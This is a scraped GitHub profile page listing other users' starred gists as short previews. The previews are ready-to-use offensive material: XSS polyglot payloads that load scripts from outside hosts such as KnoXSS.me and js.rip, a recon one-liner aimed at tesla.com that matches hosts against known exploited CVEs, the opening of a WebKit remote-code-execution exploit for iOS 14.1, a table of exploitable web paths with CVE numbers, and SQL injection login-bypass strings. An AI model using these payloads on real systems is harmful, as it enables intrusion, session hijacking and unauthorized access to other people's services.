Skip to content

Instantly share code, notes, and snippets.

View hxlxmjxbbxs's full-sized avatar
🚩
Capture The Flag !

Halim Jabbes hxlxmjxbbxs

🚩
Capture The Flag !
33 followers · 162 following
View GitHub Profile
@nullenc0de
nullenc0de / xss_payloads.txt
Last active August 4, 2024 23:02
XSS_Payloads
<Script/Src=//KnoXSS.me/00?1=1290></Script>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:KnoXSS.me\00?1=1290/.source))//>
JavaScript://%250A0?1:import(/https:KnoXSS.me\00?1=1290/.source)//*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(d=document,d.body.appendChild(d.createElement(/script/.source)).src=/https:\\KnoXSS.me\00?1=1290/.source)}//\76-->
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"><img src=x onerror='fetch("https://js.rip/t9eoip8zws)'><script>$.getScript("//js.rip/t9eoip8zws")</script><script src="//js.rip/t9eoip8zws"></script>
@nullenc0de
nullenc0de / Shodan_scan
Last active July 5, 2023 18:13
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt
subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3 |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt
@a-sync
a-sync / deobf.cmd
Last active May 10, 2024 07:29
batch obfuscator / deobfuscator
@echo off & setlocal
if "%~1"=="" exit /b
if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b
<"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1")
@nullenc0de
nullenc0de / api-linkfinder.sh
Created August 7, 2021 11:17
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
@ujin5
ujin5 / fuck.js
Last active August 14, 2024 21:56
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@kafkaesqu3
kafkaesqu3 / exploitable_webpaths.md
Last active May 7, 2024 09:38
easy wins - exploitable/leaky web paths
Exploit/description Path
Microsoft Office Online Server SSRF (relay) /op/view.aspx
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519 /jobmanager/logs/
CVE-2017-7615 /verify.php?id=1&confirm_hash=
CVE-2018-1000130 /jolokia
CVE-2018-1000130 /actuator/jolokia
leak /actuator/env
@fuckup1337
fuckup1337 / JavascriptRecon.md
Created January 18, 2021 20:02
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@spenkk
spenkk / sqli-auth-bypass.txt
Created November 17, 2020 14:10
SQL Injection Authentication Bypass payloads
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
@richlamdev
richlamdev / hash lookups
Last active February 24, 2024 07:57
Hash lookups online
LIST OF WEBSITES DEHASH / HASH ONLINE
https://crackstation.net/
http://crypo.in.ua/tools/
http://www.md5decrypter.co.uk/
http://www.md5this.com/index.php
http://md5hack.com/
http://www.miraclesalad.com/webtools/md5.php
http://hash.online-convert.com/md5-generator
http://md5decryption.com/
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active September 18, 2024 19:26
Subdomain Wordlist